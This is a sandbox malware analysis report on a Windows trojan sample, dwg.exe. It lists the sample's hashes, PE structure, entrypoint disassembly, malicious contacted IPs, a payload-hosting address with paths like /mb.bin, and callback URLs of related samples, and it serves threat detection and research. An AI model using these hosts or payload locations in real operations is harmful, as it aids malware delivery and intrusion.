                            http://www.guillemaudexcellenceauto.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmttrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFtyrundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.tiro.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://45.153.203.33/dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                            		high
                                            http://45.153.203.33/53321935-2125563209-4053062332-1002dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.123-reg-new-domain.co.uk/iframe.htmlrundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                              		high
                                              http://45.153.203.33/mb.bintSkmdwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://45.153.203.33/mb.binI;dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fonts.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                192.0.78.25
                                                		unknownUnited States
                                                		2635AUTOMATTICUStrue
                                                146.148.189.216
                                                		unknownUnited States
                                                		26658HENGTONG-IDC-LLCUStrue
                                                23.227.38.74
                                                		unknownCanada
                                                		13335CLOUDFLARENETUStrue
                                                34.102.136.180
                                                		unknownUnited States
                                                		15169GOOGLEUStrue
                                                104.21.56.93
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUStrue
                                                45.153.203.33
                                                		unknownNetherlands
                                                		35251NETLABFRtrue
                                                94.136.40.51
                                                		unknownUnited Kingdom
                                                		20738GD-EMEA-DC-LD5GBtrue
                                                47.110.53.154
                                                		unknownChina
                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:358411
                                                Start date:25.02.2021
                                                Start time:15:33:06
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 17s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:dwg.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:27
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/0@13/8
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 49.4% (good quality ratio 43.1%)
                                                • Quality average: 71.6%
                                                • Quality standard deviation: 33.2%
                                                HCA Information:
                                                • Successful, ratio: 62%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 93.184.220.29, 51.104.139.180, 52.147.198.201, 104.42.151.234, 23.211.6.115, 13.64.90.137, 184.30.20.56, 51.104.144.132, 2.20.142.210, 2.20.142.209, 51.103.5.159, 92.122.213.247, 92.122.213.194, 142.250.180.147, 52.155.217.156, 20.54.26.129
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ghs.google.com, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                192.0.78.25dwg.exeGet hashmaliciousBrowse
                                                • www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV
                                                IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                • www.wmarquezy.com/bw82/?9rjHF6y=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YeEGiH+FcCyQowbqQ==&lX9d=p48hVnrp1tqPRT7P
                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                • www.glasshouseroadtrip.com/bw82/?RFQx_=9eHfuSy5bsinEXEf9UcXOob2js7MmdckS7hVoe2yzKUXnEaN1LaM8/a2W/lIeY/LicAkBw==&GZopM=kvuD_XrpiP
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • www.vagrantmind.com/gypo/?UrjPuprX=a22oXTEFK1VaKxP6jotNX9moxeWCA++9mvVJflp0ux1+Oqp3qAY+htsSgKT64ou7evePhg==&nnLx=UBZp3XKPefjxdB
                                                D6ui5xr64I.exeGet hashmaliciousBrowse
                                                • www.alexcristal.com/kre/?FDHHVLz=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlPxZTSDnQnyx&Rb=VtX4-
                                                9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                • www.alexcristal.com/kre/?aR-8_FK0=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlMRjDDjfKAT2&UlPt=DVohLl3xOrmlMF
                                                po.exeGet hashmaliciousBrowse
                                                • www.spanishjaponia.com/wtb/?tdcxfR=/SLohMkaSme8KQmscEO5zyeff+NH4C7nb7Kbu7K9qBGaaLOXNqJ/IyUS4tswlt55UVBx&DxoHn=2daDG
                                                SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                                • www.brightandfreshfaces.com/css/?X2MhMfE0=ZN3ViUDOzxg5uhKqZwbFMgY8qo8vAnJC8OVwb1xkx9iwE6Y5op56c5mUT7DJAYlQEeIN&8p=EZTP7L
                                                FEB_2021.EXEGet hashmaliciousBrowse
                                                • www.leadeligey.com/bw82/?rp=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ&RR=YrHlp8D
                                                VESSEL SPECIFICATION 2021.exeGet hashmaliciousBrowse
                                                • www.v-surf-boards.com/thg/?hdmTvBAH=vedIkwMGAXbyu6oNrwAvvXp483A8bH0EhwZ5FQQQ4sr9cn5ccMruY6e7Q8V7TpjHwSYA&BR-tMX=XPJtkJ38
                                                Docs.exeGet hashmaliciousBrowse
                                                • www.w-ciszy-serca.com/mph/?BXnXAP=YrhH0RRxT8EL1Dl0&2d8=HhP/jN+N/sXTaZ8/3fGnc0oK8/ih6OJXlCeyiM3x1xpWLsZL7bbd6eZCGkHpoe1MVPjf
                                                8nxKYwJna8.exeGet hashmaliciousBrowse
                                                • www.treningi-enduro.com/csv8/?OjKL3=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&UT=EhUhb4
                                                Xi4vVgHekF.exeGet hashmaliciousBrowse
                                                • www.newfacesatv.info/rina/?GFQL=ppFJhxZ/poTzDSMGT1HJyUg3NUxhm/dyZyRA539kIehONzPOa9y11HW9paxI3u+DZB07&wFN0DX=UtX8E
                                                hkcmd.exeGet hashmaliciousBrowse
                                                • www.glasshouseroadtrip.com/bw82/?FVWl=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&AlO=O2MtmfRxc
                                                2Debit Note_OwnersInvoices.exeGet hashmaliciousBrowse
                                                • www.kazancsere.net/ivay/?NrQLEP=D48x&1bz=aaBEw9Yir1+hkeWoWLH1LjL9H2PhIHEM/4MpJ31it9FOz57KTCmY8+Kffl97ACZ0KQ0a
                                                YWrrcqVAno.exeGet hashmaliciousBrowse
                                                • www.glasshouseroadtrip.com/bw82/?u8iLW=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&OhNhA=9rUlSVPXQJJ
                                                j64eIR1IEK.exeGet hashmaliciousBrowse
                                                • www.treningi-enduro.com/csv8/?Bz=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&R0G=dhrxP2v88TRtsx
                                                Order confirmation 64236000000025 26.01.2021.exeGet hashmaliciousBrowse
                                                • www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
                                                D6mimHOcsr.exeGet hashmaliciousBrowse
                                                • www.wmarquezy.com/bw82/?7n=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YS9KDr+Saej&RZ=Y4C4ZlKPDRhPDXy
                                                r.exeGet hashmaliciousBrowse
                                                • www.andrewsreadingjournal.com/uds2/?_jPlXT=HdLSVyUFGLZERDc21vAze+eEMrorFA8CuNZ+YPXMfnOMoW52wWx899FazcdJxWS7BsXFqvIALA==&n4=iN68RdPpj

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                shops.myshopify.comRQP_10378065.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                transferir copia_98087.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                0O9BJfVJi6fEMoS.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                4pFzkB6ePK.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PO_210222.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SecuriteInfo.com.Trojan.Inject4.6572.10651.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                PDF.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                D6ui5xr64I.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Drawings.xlsmGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                Purchase order.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                IMG_7189012.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exeGet hashmaliciousBrowse
                                                • 23.227.38.74
                                                DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                • 23.227.38.74

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                AUTOMATTICUS55gfganfgF.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                RFQ TRQ04022020_pdf.exeGet hashmaliciousBrowse
                                                • 192.0.78.133
                                                dwg.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                • 192.0.84.247
                                                AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                D6ui5xr64I.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                AgroAG008021921doc_pdf.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                P.O-48452689535945.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                CMahQwuvAE.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                kgozmovHpY.exeGet hashmaliciousBrowse
                                                • 192.0.78.24
                                                9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                ransomware.exeGet hashmaliciousBrowse
                                                • 192.0.78.12
                                                po.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                                • 192.0.78.25
                                                ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                • 192.0.78.12
                                                HENGTONG-IDC-LLCUSPO_210222.exeGet hashmaliciousBrowse
                                                • 104.232.96.251
                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                • 202.14.6.113
                                                zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                • 203.88.111.71
                                                Payment_Advice.exeGet hashmaliciousBrowse
                                                • 107.178.135.177
                                                Order 8953-PDF.exeGet hashmaliciousBrowse
                                                • 103.202.50.110
                                                IN 20201125 PL.xlsxGet hashmaliciousBrowse
                                                • 45.41.85.153
                                                Order Catalogue.xlsxGet hashmaliciousBrowse
                                                • 146.148.242.120
                                                documents_0084568546754.exeGet hashmaliciousBrowse
                                                • 104.232.66.117
                                                EK6BR1KS50.exeGet hashmaliciousBrowse
                                                • 146.148.193.212
                                                SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exeGet hashmaliciousBrowse
                                                • 107.178.135.177
                                                Arrival Notice.exeGet hashmaliciousBrowse
                                                • 146.148.192.218
                                                PO101420.exeGet hashmaliciousBrowse
                                                • 203.76.236.102
                                                J0OmHIagw8.exeGet hashmaliciousBrowse
                                                • 146.148.193.212
                                                urgent specification request.exeGet hashmaliciousBrowse
                                                • 45.42.89.146
                                                Doc_74657456348374.xlsx.exeGet hashmaliciousBrowse
                                                • 104.232.66.117
                                                XWW8KE7078.exeGet hashmaliciousBrowse
                                                • 45.41.85.153
                                                yKFlKg9R6m.exeGet hashmaliciousBrowse
                                                • 45.41.85.153
                                                current productlist.exeGet hashmaliciousBrowse
                                                • 107.178.155.203
                                                Details!!!!.exeGet hashmaliciousBrowse
                                                • 146.148.190.200
                                                googlechrome_3843.exeGet hashmaliciousBrowse
                                                • 146.148.193.212

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):5.724499720734536
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:dwg.exe
                                                File size:98304
                                                MD5:6a9035b7435c6aa9e6c8e31cf771e316
                                                SHA1:16a6d2ac44b8ac3cbe112916d8cd9912d3f0dbf7
                                                SHA256:6f33f5e3a23420dacdc26fb8e2eef07fe482e634d4b832b0917cbe7ed37864f5
                                                SHA512:bc77de47966c4efff0220fbac4ce74051d76b283eac0d2c7ebeeadb680cccbc96bc303ed6df3606c87071a87854c1fcbf2b2dd5eeb5909ce83600dce8643fc04
                                                SSDEEP:1536:AbLxrs30pwHPhtvxYovnvasYyFbJotMK8nlKmbL:ILPM5QyF1vHL
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...e.]N.................0...P......H........@....@

                                                File Icon

                                                Icon Hash:10b0b2095489f81e

                                                Static PE Info

                                                General

                                                Entrypoint:0x401348
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:
                                                Time Stamp:0x4E5D1F65 [Tue Aug 30 17:35:33 2011 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

                                                Entrypoint Preview

                                                Instruction
                                                push 00404250h
                                                call 00007F84D4A2D675h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                xor byte ptr [eax], al
                                                add byte ptr [eax], al
                                                inc eax
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx-62h], bh
                                                sbb dh, byte ptr [edi+4685EFCEh]
                                                stosd
                                                push esp
                                                mov eax, E57BCCEEh
                                                fadd dword ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx+4Eh], al
                                                push esp
                                                inc ebp
                                                push edx
                                                dec ecx
                                                inc ecx
                                                inc esp
                                                inc edi
                                                push edx
                                                dec ecx
                                                pop edx
                                                pop edx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add bh, bh
                                                int3
                                                xor dword ptr [eax], eax
                                                and byte ptr [ebp+16h], ah
                                                rol dh, cl
                                                and eax, B44EA7F0h
                                                jecxz 00007F84D4A2D696h
                                                movsb
                                                cmp bh, ch
                                                retn 8EA3h
                                                mov bl, C0h
                                                jc 00007F84D4A2D664h
                                                daa
                                                inc edi
                                                test al, B7h
                                                jne 00007F84D4A2D6F7h
                                                push 3A215E00h
                                                dec edi
                                                lodsd
                                                xor ebx, dword ptr [ecx-48EE309Ah]
                                                or al, 00h
                                                stosb
                                                add byte ptr [eax-2Dh], ah
                                                xchg eax, ebx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                in eax, 2Dh
                                                add byte ptr [eax], al
                                                out dx, eax
                                                daa
                                                add byte ptr [eax], al
                                                add byte ptr [eax], cl
                                                add byte ptr [edx+45h], al
                                                push esi
                                                inc edi
                                                inc ebp
                                                dec esp
                                                push ebx
                                                inc ebp
                                                add byte ptr [42000C01h], cl
                                                jnc 00007F84D4A2D6F7h
                                                imul ebp, dword ptr [esp+ebp*2+00h], 00000000h

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x136f40x3c.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x2c72.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x30
                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000xd8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x12b040x13000False0.439453125data6.24870257971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .data0x140000x19cc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc0x160000x2c720x3000False0.409342447917data4.49735724086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x17dca0xea8data
                                                RT_ICON0x175220x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2763565, next used block 3552051
                                                RT_ICON0x16fba0x568GLS_BINARY_LSB_FIRST
                                                RT_ICON0x16cd20x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3207626755, next used block 12467
                                                RT_ICON0x16baa0x128GLS_BINARY_LSB_FIRST
                                                RT_ICON0x165420x668data
                                                RT_GROUP_ICON0x164e80x5adata
                                                RT_VERSION0x161e00x308dataChineseChina

                                                Imports

                                                DLLImport
                                                USER32.DLLHideCaret
